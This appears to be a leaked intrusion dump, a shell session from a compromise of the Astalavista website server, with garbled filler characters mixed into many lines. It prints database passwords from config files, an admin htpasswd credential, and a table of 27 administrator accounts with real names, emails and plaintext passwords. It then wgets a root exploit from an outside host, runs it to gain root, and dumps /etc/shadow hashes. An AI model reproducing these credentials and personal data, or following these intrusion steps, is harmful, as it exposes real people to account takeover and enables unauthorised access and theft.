* L) z/ r# V. I2 rtotal 200" W. A# U" F2 ^9 `
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 . o+ q- u- S5 q
drwx–x–x 8 astanet astanet 4096 Dec 23 13:53 ..' Q$ ~- |6 v) G2 ~
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _007
5 j8 U. [$ ~) y9 b6 f% S7 K3 Ldrwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql/ l; {: v. w0 p0 t8 D$ Y/ a
drwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 链接标记astanet@astalavista.com
) ?. v3 [1 x% d" X d0 S! u2 tdrwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend. u/ ~! u7 n; G* s# v, S/ r% Z
drwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner, i: N. i& y9 W0 N' C7 k9 C% [' M8 f
-rw-r–r– 1 astanet astanet 25724 Apr 4 2006 banner.jpg
& W& m0 c8 ^: n6 Rdrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config! p7 f! u4 G+ r* F0 i* _; @ m
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron
* p9 d( v8 A! g3 ~4 u0 f; n" C" Jdrwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd
* Z6 B& `7 I! s& k$ R-rw-r–r– 1 astanet astanet 36 Jan 5 2006 error.php5 {- W7 X& E6 W" C+ o
-rw-r–r– 1 astanet astanet 1406 Jan 5 2006 favicon.ico
5 x }; W# y4 G6 d# Zdrwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed
4 a! x: M) |! d* v' R1 Jdrwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour* `8 {" ~' w* t t7 A
-rw-r–r– 1 astanet astanet 18 Jan 5 2006 htaccess
" k' O% M. e+ T$ F6 e-rw-r–r– 1 astanet astanet 585 Mar 24 14:50 .htaccess* B4 j( ^# b% M8 O Y) |
-rw-r–r– 1 astanet astanet 398 Jan 5 2006 index1.php
$ V; @+ g! X! f1 O7 m+ w-rw-r–r– 1 astanet astanet 1036 Jan 5 2006 _index.html! D7 b3 U3 d( e" ~! o
-rw-r–r– 1 astanet astanet 6880 Dec 23 14:44 index.php
B) q7 V+ ~6 A9 `) F; `-rw-r–r– 1 astanet astanet 676 Mar 21 2006 index_redirect.php
- e) ]6 I; Y7 W, s) B- n-rw-r–r– 1 astanet astanet 739 Feb 24 2006 index.swf
, Y1 f+ E" K {5 D. N7 l7 D5 R5 tdrwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc$ d3 N7 {) z) m ?: O% i; a
drwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang# h7 L3 L$ U) u W; y
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib
0 q, y/ l" o; w' w6 t! Udrwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log
/ I* u7 g3 K7 p1 N& Kdrwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member
8 I- r5 t. L+ b" ]; H3 udrwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata
+ p$ l4 H1 G6 ?) l8 d# Y$ rdrwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new% I( D7 i v j2 n
-rw-r–r– 1 astanet astanet 7219 Feb 24 2006 pix1.swf
. W& {; k Z1 j C: f+ s4 {drwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re
$ J6 S& n1 i" @4 u-rw-r–r– 1 astanet astanet 23 Jan 5 2006 robots.txt) h( ^& [9 ]4 r
drwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss$ C8 V( D4 }/ a2 I6 t
drwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources- T) \5 w" L* q+ b2 c' {( b
drwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com& e+ W0 F5 p2 h8 k0 T
drwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes
& Y& a! k+ ?" i0 [" |( B" Q% w" pdrwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src
" o7 s3 r% x; z; @2 `drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl+ _3 \- _. ~, I: Q3 c
drwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v2
/ R* i c4 H6 P4 N* F3 m' Gdrwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old
|$ k; X+ A: u" L( t-rw-r–r– 1 astanet astanet 35 Dec 4 2006 webcash.php
: J# T4 o0 a3 q6 ]# K/ R! S: Q, Ydrwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki
; g' g3 Q) y: `4 S' [: Z. k+ P& c
) M9 r; n% T5 _( z2 u; \sh-3.2$ head -20 index.php
, C; D# B6 w3 i+ g! \) ^<?PHP
- D! P! f8 ?# i) j6 `1 _! z/**
' T! d5 C q0 T3 p* Mainfile (external) for astalavistaNET v2.0
0 d6 L7 d7 b( |" \. E*' j, V1 f: |8 o" f* a1 ?6 K
* @copyright Astalavista IT Engineering GmbH. Y0 \2 n- g8 A
* @author Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>
& A3 c; J7 Q* V. F* @version 1.0
, W7 I+ f1 g6 `9 Q+ T- r }*/. w& p) B- h) T( X$ e N/ a( D
) N- m$ G- b$ k% E
if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {7 Z$ v X. ~5 f
$dontStartSession = false;
8 I5 x0 X8 ~, b5 S- @( _ { } else {
& T( q4 n* g' E+ S' _2 {. x $dontStartSession = true;! N* t* B$ S3 j9 \; C8 B
}
/ m: j6 h+ M3 Y/ B require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);
5 i& ~0 B0 Y4 j/ E2 I! S1 A* M require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);
, Q3 |7 s7 p. D7 k; B4 o require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);
" y4 [( E' S, y: ] require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);0 x- P. @0 Y4 {
! j# _" F! C2 Q0 Bsh-3.2$ cd config
/ a/ H, s/ N' G1 x: ssh-3.2$ ls -la
: j" B8 q( o: `1 a% u" jtotal 32/ F& F9 m+ }6 l* ~) [
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .
, k* T: i5 k/ L0 D9 {& L+ r! \drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..# ]4 k" N2 P+ N1 J- P/ V/ C
-rw-r–r– 1 astanet astanet 987 Aug 11 2006 adm.conf.php8 N6 d2 ]2 c6 i9 C% S0 J) \
-rw-r–r– 1 astanet astanet 4937 Dec 23 15:48 com.conf.php: j5 i+ M4 P- N& t5 _# _6 A" P
-rw-r–r– 1 astanet astanet 913 Aug 11 2006 cron.conf.php4 w- _) i" x8 l2 _$ G0 ?
-rw-r–r– 1 astanet astanet 1668 Aug 20 2008 ext.conf.php' L3 U c0 t l- R
-rw-r–r– 1 astanet astanet 2724 May 30 2007 int.conf.php
* Y; ~1 T; ?- g1 I2 B
6 O' T4 S, V4 d/ I: s+ j# H/ Zsh-3.2$ cat com.conf.php# c5 v" ~) j+ q y w8 H8 v
[snip]% \. f, S. K- K& \( ], [2 s
//member-database% l8 _' W! E ^* Y: A! B
$_CONFIG['db_mem_server'] = ‘localhost’;5 M- l, K" t. D$ y- @
$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;
' \6 U* t. ]: Z* p; u# }" A$_CONFIG['db_mem_user'] = ‘astanet_db’;2 _6 ]7 V0 J' T. @8 M' ^9 Z3 o
$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;
+ Q0 K# z& h4 i( e4 R. d$_CONFIG['db_mem_debug'] = false; //true or false- k% l5 S3 F, P0 a% Q
//ads-database& y, I" ~1 C5 z3 N: _
$_CONFIG['db_ads_server'] = ‘localhost’;/ e" ~+ d' O2 o" b
$_CONFIG['db_ads_database'] = ‘astanet_ads’;( h; e6 M2 ^% ]4 ]
$_CONFIG['db_ads_user'] = ‘astanet_db’;6 M6 u4 d( L/ H/ d: O
$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;
7 F& Q( |1 [- X$_CONFIG['db_ads_debug'] = false; //true or false
0 R3 f% L. F3 R' y! t//rainbow-database
" l) F) u$ h) Y& y+ R- h/ ^$_CONFIG['db_rainbow_server'] = ‘212.254.194.163′;# U' d9 c" \9 [5 s, z* a
$_CONFIG['db_rainbow_database'] = ‘rainbow’;
+ L8 l6 B, H F* `. N/ O$_CONFIG['db_rainbow_user'] = ‘dinu’;
! w2 ?: u9 P# Q% Y, q$_CONFIG['db_rainbow_password'] = ‘dinudinu’;
' b& w0 o8 c) ]8 l& n+ J: V* V- v+ C+ Z$_CONFIG['db_rainbow_debug'] = false; //true or false
, `9 S3 U- B; W9 Y& H8 J//mailing lists database4 a5 |0 x7 P0 y! M/ j3 ?( J) |
$_CONFIG['db_mailing_lists_server'] = ‘localhost’;0 q: I) H7 U! q% j5 r
$_CONFIG['db_mailing_lists_database'] = ‘astanet_mailing_lists’;
8 M* u8 O5 \$ ~! I; k8 [& o$_CONFIG['db_mailing_lists_user'] = ‘astanet_db’;9 p' P* S# ?' F4 F: I2 i' @: x
$_CONFIG['db_mailing_lists_password'] = ‘TXwVrC7hbq’;+ a. C" D- l2 t) ?
$_CONFIG['db_mailing_lists_debug'] = false; //true or false \+ C1 P6 I' b
//paypal6 a1 X' E* L! j# J
$_CONFIG['sub_pp_url'] = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;
" `9 [ X2 D/ ~; B$_CONFIG['sub_pp_cmd'] = ‘_xclick’;
+ |6 t7 |' B; Z3 I# _1 G& R. m$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;
" p' U5 f2 C, }0 z, T% x* i7 b) ?$_CONFIG['sub_pp_noship'] = ‘1′;+ w$ [9 d3 b( a6 Q
$_CONFIG['sub_pp_referer'] = ‘链接标记[url]https://www.paypal.com/[/url]’;
- e2 M$ G( ?3 z: _! ~2 r3 O[snip]
% c$ K0 M$ r% D' i$ I% H
. r' z- S# f1 ?" vsh-3.2$ cd ..
- d7 [/ j5 f. X7 N% S8 c: M1 esh-3.2$ cd member- I% C9 Z) q' N8 x5 H* _* ]- W
sh-3.2$ ls -la O6 {: P; R1 r: C! }3 g
total 20
2 C; D6 F, ~: v# B- t2 _! Hdrwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .
3 N8 n6 d! W: adrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..5 K. F+ f: Y! q4 e& V! G* O! W9 b
-rw-r–r– 1 astanet astanet 19 Jan 13 14:02 .htaccess; D Y6 N: ]0 A0 t! t( E6 r
-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php
! f( _9 t7 T& Ash-3.2$ cat .htaccess
" l- R+ T. g# T! K5 PSecFilterEngine off/ i9 L0 Y, j% |, L" @1 ]# Q
+ K" a2 A+ ]3 b+ M* Jsh-3.2$ cd ..& B _6 `3 u, e: G
sh-3.2$ cd cron% k8 w( C. _% r
sh-3.2$ ls -la
+ G7 |, Y5 h" D/ k% j j, L$ O* Itotal 168
- h) G: o- ^* {7 o" \drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 ., V) Y6 n* `4 r
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
# ]3 T7 R; N0 L: x- x8 E-rw-r–r– 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php+ y; Z; z- f" h! [
-rw-r–r– 1 astanet astanet 2356 Aug 11 2006 0_functions.php; z" \) c* x0 E1 Z3 N9 O
-rw-r–r– 1 astanet astanet 3616 Dec 23 15:44 1_daily.php$ _3 t( w( s" x6 k, |9 P- [* O( Q
-rw-r–r– 1 astanet astanet 527 Aug 11 2006 1_fivemin.php, e# l; Z6 J' G4 h
-rw-r–r– 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php) X5 k" G s) ]
-rw-r–r– 1 astanet astanet 432 Aug 11 2006 1_weekly.php+ \( l+ J% E& w4 `! Q9 w* E
-rw-r–r– 1 astanet astanet 2277 Aug 11 2006 2_advertising.php' L9 |6 X3 P' O4 P1 ^
-rw-r–r– 1 astanet astanet 4882 Dec 23 15:40 2_archives.php
" X+ _) |2 [$ l( K$ m& M) C-rw-r–r– 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh
& {" n3 i1 i6 s$ E-rw-r–r– 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php
" F2 x6 u) {+ a3 c, E# T6 I- i-rw-r–r– 1 astanet astanet 14979 Jan 12 09:10 2_expire.php- I9 f- H! q* |( L
-rw-r–r– 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php) S+ c9 |: C, I) E: A5 e
-rw-r–r– 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh8 R c, ]6 C: A$ T0 H
-rw-r–r– 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php T* Q. E5 | z- b* G. ?
-rw-r–r– 1 astanet astanet 15664 Sep 22 2006 2_keywords.php
& p4 K% C( x" D: A1 S" \+ B-rw-r–r– 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php
: R' `7 ?" x# Z. z) h' i-rw-r–r– 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php( f* u8 S8 T& j- l
-rw-r–r– 1 astanet astanet 796 Aug 11 2006 99_create_emails.php* d% G: H+ h6 V
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email) U4 L5 O/ M$ o& O; m |4 b
-rw-r–r– 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php
/ J1 b# T/ o+ ?/ J t-rw-r–r– 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php
: W/ L# p) H/ v/ C( E" \5 j+ x$ J7 B( n2 E, a+ K$ ]" \0 b1 a* x
sh-3.2$ cd ..# t6 _* c; c2 M: N+ ]# I
sh-3.2$ cd _007- K) U. J4 \: Q7 p" g9 c
sh-3.2$ ls -la
; V+ [( J. d* M* G: Z' V5 S! h: Ktotal 24
/ @5 b8 b. |4 J' `$ adrwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 .
" Q/ H" ?1 {" }drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..% X2 a! t0 m% l: c2 K) E
-rw-r–r– 1 astanet astanet 96 Dec 23 15:17 .htaccess
+ B- B$ s8 I: y( U-rw-r–r– 1 astanet astanet 3263 Jan 15 2007 index.php
: S3 v) s4 u: X1 D6 d-rw-r–r– 1 astanet astanet 20 Dec 27 2006 info.php2 r1 M! t, M" |0 m8 d) b
drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap
8 g$ v0 x6 L( }8 T( R+ r& d4 h' K
, v- h9 ?+ p7 gsh-3.2$ cat .htaccess5 H0 L2 A7 u3 I- z6 e
authType Basic7 n: M, I9 k! r
authName Admin6 n# g* Q$ A9 N4 j' O
authUserFile /home/astanet/auth/.htadm_pwd
/ Z) f t7 ?- k& n5 a$ X6 |: f( Orequire valid-user
9 n: Q/ m7 D% b/ {
; J9 f! s' D& F- esh-3.2$ cat /home/astanet/auth/.htadm_pwd
% n8 z) r* \( @$ gadmin2net:CR0bl65MwhfT
5 W# Q, A1 v% ^* c, C3 r0 V8 X
7 q5 r5 `$ f$ [3 o8 _sh-3.2$ mysql -u astanet_db -p
. G4 W0 P" S4 UEnter password:+ P, h! @# \1 Z% S0 z
Welcome to the MySQL monitor. Commands end with ; or \g.9 w7 Q# k$ v$ I7 Z5 f" u
Your MySQL connection id is 275153: k+ E; q7 J: D, u
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
" N$ d+ a+ L' H ^0 n9 ~
0 o2 p( J- `6 U1 c$ I& E1 `Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer./ b( v/ w7 `5 ~0 A E
y* P$ w5 F% r, A& o5 J/ Smysql> show databases;
3 S" _, E/ U' h0 ~+———————–+, L& ]/ r1 s( s% T
| Database |' _1 c; h: V' Y# l
+———————–+
. `0 s! S3 g3 D7 T| information_schema |
# d" v9 ~. t- W* \' a& ~| astanet_ads |
% y: o0 C* O Y+ u2 M) F% R! x| astanet_mailing_lists |
: U* f7 W3 B& \4 d| astanet_mediawiki |
5 U7 r5 @% z8 D2 Q| astanet_membersystem |
+ q) \( F% U( Y4 X% n; x4 H) B: R| test |5 Q3 N& c( A$ ?8 H
+———————–+
/ G5 p# N+ i7 ?# C( y6 rows in set (0.00 sec)
( O8 H4 x0 L0 L5 u* L2 W% i2 d' j% g$ y
mysql> use astanet_membersystem
' F: g5 I' Y1 A, R6 e' g( _Database changed
' b, u- b2 z) J( Qmysql> show tables;( q; {2 J" p* g$ I% z7 F
+———————————–+
e+ M+ W# Q/ w5 q' F| Tables_in_astanet_membersystem |2 D3 f, Q9 i! i4 J* J
+———————————–+2 A( o: _8 }( L7 f1 Z8 D, }$ W
| blacklist_categories |1 Q. A* V$ P2 E. t; Z4 V3 J
| blacklist_content |
$ i* @' S# s& o| blacklist_levels |
1 E+ V; e. E) O* J% U# a9 U| blacklist_mcset |7 G1 V8 o! E- }. _+ `" g+ F
| dir_categories |
3 ~- h& c% p# [1 G5 D| dir_comments |
3 J9 y1 C0 m9 i, \8 p| dir_links |
2 t" \9 o. Y4 ^0 ^; i( W| dir_temp |
7 P4 u0 I: U' K. R% `( W| dir_votes |
/ x/ M* G& B* {5 e8 E| documents |4 r7 X9 ^( S2 ^
| documents_categories |
: q2 R- S# F: Z+ ~3 Y| email_content |
, \1 }" l# Z5 I: C. s+ j- A| email_settings |
]# l7 H! \8 M| exploits |3 d( X/ p% G* \. v3 M* v' Y0 g
| exploits_categories |, L) ~6 F: G8 h& A/ C) H' c; N
| exploittree_categories |. ^# n8 ]: T& d2 t* w x0 e% F( U
| exploittree_exploits |5 F$ B; d0 {9 f0 _& k3 l2 m/ k) n/ ^
| home_values |: ^/ a' _. l9 G4 n$ N3 V' i- m
| iso_countries |4 S! Y% }, g7 A. P) v
| links_categories |, \1 C( x! q5 P a
| links_records |
6 Z3 R; I5 z, j# c- d8 ~4 X| links_unauth |9 r0 G' T5 k M
| links_votes |3 { {4 K/ v1 s ]
| log |: T2 c7 ^& }+ \
| news_categories |
6 K1 Q3 \: ]+ c+ Q. T0 Z| news_comments |
; l1 Z+ s I3 ?0 C5 \| news_emoticons |& u! D; o \) Q, v
| news_latest |4 c" X+ y2 A+ w
| news_messages |
4 Z8 j: j% c% v8 f; `2 z$ z| news_statistics |9 A% ?( E/ }7 z* k( i* T
| news_votes |8 D* }) F- I% v& U x% ]
| prices_content |
- b p9 _6 p1 {) L! F| prices_offers |0 @ N4 g% ]: g) d, |
| rss_settings |
: A4 ]0 t( ]6 O% `2 u, Y| sessions |
7 r- y' g* _$ T| stats_signups |# Q8 S9 K( Y T6 v2 |- P6 v- w
| u2u2 |* D' r- Z+ x7 Y% A4 _' u r
| u2u_contact |
# }% S, i4 m( v+ K| u2u_settings |
! Y" }0 f3 m% V+ y8 J N- U| user_keywords_selected_categories |; d" m3 m% Q5 K3 g7 a, p3 U
| users |
9 ^6 r( a4 O3 y1 `4 i* ?+ c/ p| users_ipn_test |
. t2 k/ @- x; o0 C" g6 Q+ V| users_keyword_values |
# A" t/ y7 \- [: @- h1 P6 w6 k% e| users_profile |+ c" @" `# s0 [/ F" S+ q8 `, v
| users_temp |* e! c, }: _: M( j+ |
| users_upgrade |3 I6 V4 t. s$ m3 X8 K
+———————————–+
. a' D' p" e$ r: A% b9 T6 ]46 rows in set (0.00 sec)
) L4 ?$ V c: w$ z6 A& i
9 Q8 }( y& P! x8 c D- C( Emysql> describe users;- p8 p2 i9 n3 ^$ n3 b9 D# s
+————————–+————————————–+——+—–+———————+—————-+& k, }5 y# [4 \' q" D; e
| Field | Type | Null | Key | Default | Extra |' k7 c+ U6 B% P
+————————–+————————————–+——+—–+———————+—————-++ W' A7 ], d/ c; ~
| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |
! {2 ?9 d9 b" w- ]8 J1 `* O. g% B| user | varchar(50) | NO | | | |
4 h& N' j* U8 H( `5 x& h8 k* b| nickname | varchar(30) | NO | MUL | anonymous | |- \5 E1 R2 |0 { o
| password | varchar(30) | NO | | | |7 F# T D H7 Z* ]8 N* k
| userlevel | tinyint(3) | YES | MUL | NULL | |
9 V. F! w6 |+ || exp | int(8) unsigned | NO | | 0 | |/ o: t7 H* b1 r4 t8 E
| email | varchar(50) | NO | | | |3 k/ _3 \- B9 F! V; ]
| ip | varchar(15) | NO | | 0 | |
% Y6 \3 C. w+ y| proxy | set(’0′,’1′) | NO | | 0 | | P* H) e; J. F/ {1 I6 f' C
| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |
- ?# Z4 T, g6 ~$ y| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |
( X# i! s* U8 c- u| anz_in | tinyint(1) | NO | | -1 | |) I8 Y6 f, ?/ M
| status | tinyint(1) unsigned | NO | | 0 | | R( N; L* }* J. N3 f6 G
| checked | set(’0′,’1′,’2′) | NO | | 0 | |
5 B* |. x) I( O5 A: I| freemember | set(’0′,’1′) | NO | | 0 | |0 s2 M2 z) O l
| ordertype | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES | | NULL | |# T7 y# e; }. X7 @2 \. q# P
| lang | tinytext | NO | | | |
: ` r' g+ o" _| adid | smallint(6) | NO | | 0 | |
( [; M: |3 q% R+ Y| pp_txn_id | varchar(255) | YES | | NULL | |
r% F4 _ o4 V4 Y# _| cnb_transaction_id | varchar(255) | YES | | NULL | |
, T0 e% y C0 ^1 l/ n| cnb_order_id | varchar(255) | YES | | NULL | |% V& u$ M. R; L' Z( [/ ]7 U9 L
| cnb_user_id | int(11) | YES | | 0 | |
4 S4 \' G- a, z( p. h6 X2 m+————————–+————————————–+——+—–+———————+—————-+0 @& A6 f& C. M) `* R" H& D
22 rows in set (0.01 sec)
3 F# ]6 {/ N- N4 j. I+ Z/ L3 _& x8 U; e! X' ]# n& i
mysql> select count(*) as skids from users;
6 }0 l8 x8 R3 A0 |+——-+
- o" \9 P2 b3 _- e; _: _+ F; n| skids |7 m. T' d6 n/ o) L) r
+——-+
, }* W% ~+ `7 @, N! [| 25199 |
5 I; k8 x6 B+ k/ h4 b5 m+——-+: t' A* U- ^; E" j% \
1 row in set (0.00 sec)
0 `$ ]' O4 @$ p) A+ J6 s
# o2 _! x" A( B9 J5 smysql> select user,nickname,password,email from users where userlevel = 1;
, o, ^6 c% w# | h+————————–+———————-+——————+———————————–+7 [% B( Q2 d9 ]3 F. x5 E9 I! |. T
| user | nickname | password | email |
0 q* s3 S, P4 C; |+ o) O7 P. m7 d9 G4 w+————————–+———————-+——————+———————————–+
4 b1 A$ v3 ?' Z* m5 l, n5 t- ?6 B2 S| pascal | prozac | astaman3 | 链接标记info@astalavista.net |+ k z& v3 _0 e6 u9 |
| Ivan Schmid | rOOtless1 | astalavista4asta | 链接标记ivan.schmid@comvation.com |
6 S8 G; [8 n. m7 h1 `! t- A1 _5 ~3 J! o: c- j| qreymer | Palermo | qblsw85iam | 链接标记eche@home.se |) g) D$ y3 a. E% a( l0 Z" A5 A9 F
| Christian Wehrli | g0atherd | hitt?74 | 链接标记g0atherd@gmx.net |
* ~7 M; P+ Q4 l/ P" S9 @: J' Y# L| Andrew Blake | Minky | liq73uid | 链接标记a.blake@har.mrc.ac.uk |
2 w Q- G7 [3 }! e7 @0 H- D| Martin Wyss | dinu | kj63;cXy | 链接标记martin.wyss@astalavista.net |( W+ i8 N$ z F) o* q
| Leandro Nery | Timan_no_Sanco | nery2002 | 链接标记leandronery@hotmail.com |: a2 {$ q9 k8 r7 u- N
| shaving ryans privates | ShavingRyansPrivates | memberboard313 | 链接标记shavingryansprivates1@hotmail.com |6 _4 }% V8 a6 S4 V/ R+ R
| Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | 链接标记spoofedexistence@hotmail.com |+ W0 b) r' ~/ z4 m
| David M Lee | Daremo | icG12m03 | 链接标记daremo@hackerheaven.com |+ f5 x9 _0 F# \; ~- o
| David Corn | akriel | ve3uB$cUku | 链接标记akriel@fallenroot.net |1 F, P9 ]( H2 `3 M O2 f# ~
| Thomas Kalin | Gwanun | QwErTy123 | 链接标记thomas.kaelin@astalavista.net |1 ]* } f5 c+ @0 n
| Marcus unknown | Cra58cker | hhCr4ck06 | 链接标记unknownmarcus@hotmail.com |* P, T# T1 B+ V1 s' @8 [
| David Ellis | dellis203 | philip | 链接标记dellis@nightwatchnss.com |, {0 V- f+ ?8 X3 P1 t5 }+ y% |
| Lars Christian Solberg | xeor | tF3s4|Nea | 链接标记xeor@hush.com |8 R& z w# |- f6 S
| Paulo Santos | Be1er0ph0r1 | amor01 | 链接标记pmsantos@gmx.ch |5 m* \; | o$ P; e7 h6 t
| Thomas D?ppen | daha | asta4tom | 链接标记thomas.daeppen@astalavista.ch |
. P& _8 ]$ b* d( M| Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | 链接标记toraj.a.m@gmail.com |4 t$ Y! F2 k' v2 G4 V5 x$ N
| Fabius Bernet | traviser | wellenreiter100 | 链接标记fabius.bernet@astalavista.ch |+ w3 f1 A) x, V* A/ e8 x
| Zachary McElroy | duder1 | dirty245dix | 链接标记mcelroyzj@yahoo.com |
+ s8 `! x- s$ B% C| Leron Cohen | cohen2 | leron4free | 链接标记leron@quiredmedia.com |8 s6 D' z% x/ h" v* h6 Z
| Beatriz Pontes | anonymous1656 | pitas | 链接标记joao.pedro.pontes@gmail.com |
+ F" r, T( o1 o| Glafkos Charalambous | anonymous2086 | si99490178$# | 链接标记nowayout@webhostline.com |
" Y2 B, W3 ?+ z& [4 V2 Z' B; M$ H| developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | 链接标记ivan.schmid@astalavista.ch |
" m8 x9 j3 M3 ^5 k" }- Q) f| Peter Fisher | cyph3r1 | testZer025435 | 链接标记cyph3r@astalavista.com |) l: t* D7 Y1 \) o
| sykadul | sykadul | ak29eral | 链接标记sykadul@gmail.com |' Z1 M6 Z5 C* s$ H% M
| Ronny Janzi | commander1 | mpbdaagf6m | 链接标记ronny.janzi@astalavista.ch |
! Y% B: T. @% `( ]% w2 _+————————–+———————-+——————+———————————–+
" S- k' {6 o0 \. }1 \1 o/ D, W( u27 rows in set (0.00 sec)! S7 u) V5 ^* z$ x K% w1 m( z
! _ `% f# U, l. g2 u9 o+ Bmysql> exit;. l6 n$ p( b' G# B8 Z9 g5 g
Bye* N0 V u1 C% o% a3 S9 X
: Y7 x4 M) a( J. x( `[~] plaintext passwords? yes,
- T! A. U' Z3 H9 |Those so called “security professionals” who charge you $6.66 / month to
" d" W5 a! q0 h& c9 D% \register at their hack-proof portal, save your passwords in plaintext…
2 f( U1 \; h) E+ l- o0 J0 hbrilliant!+ d d& w( d) i2 C
- l% _( q2 W* @) G! |! b+ E! e[~] This been fun but we want more.' X8 `/ d+ B1 Y9 A
5 A* u* @/ {( P2 t4 b
sh-3.2$ uname -a% j* D1 G8 |8 O
Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
6 H7 H1 o" k0 [* \sh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]( b$ h9 V" w' S7 |! ]
–13:33:37– 链接标记[url]http://anti.sec.labs/g0troot[/url]( e! I% {) P9 {% T# x8 B
Resolving anti.sec.labs… 13.33.33.37
# s- _: ]9 ?; Y4 D1 [' r( ~Connecting to anti.sec.labs|13.33.33.37|:80… connected.
8 P$ \) H" h6 g. {: k; b0 T/ b( b/ A" U. SHTTP request sent, awaiting response… 200 OK
, b$ x/ a, v! bLength: 18200 (18K) [text/plain]) X) j- h5 j6 \
Saving to: `g0troot’
4 y5 E# H! g# j- j* s+ h* m9 H) b( W2 g1 b% V- n! X. r& u
100%[=========================================================================================================================================>] 18,200 58.6K/s in4 c! g5 @: `5 Q8 @' U
0.3s& W) q4 C7 S- x/ x r
2 X' _' {) Q7 {3 Y5 A _18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]% c# l7 \' |/ S# E) V a+ l
3 O. a) B6 Z. G$ Csh-3.2$ ./g0troot -i x86_64
Z. i: c, c( n; Y, ~7 ~& n[+] g0troot - anti.sec.labs5 T: N( K5 I( Y. B$ f
[+] Target: 2.6.18-128.1.10.el5
; N% m6 l4 _5 y- i: B) c$ U[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
7 I( m I1 @* g; g/ D
4 J* j! w7 ?2 ^) R6 Q2 D' S[+] r00tr00t
7 L R* V2 S- k+ |* Z$ O& j* A[~] Executing shell…
+ I" {5 k) Z! x* j! y8 m6 Z B2 u8 M
6 \$ H. ^8 } ]) |( q+ |' l4 \0 ~sh-3.2# id% F) r& \ d# O* `* q
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)+ O. {5 _8 [& c) \; q
/ C% _6 u$ ^7 u/ q: a( q d' nsh-3.2# cat /etc/shadow& p7 c# e8 U. c' h# ~- r; P m
root 1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::
8 L3 x& z. c0 p' B- i: k[snip]* q; [, E9 n2 t
admin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::
! r4 G8 j) `* tjon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::
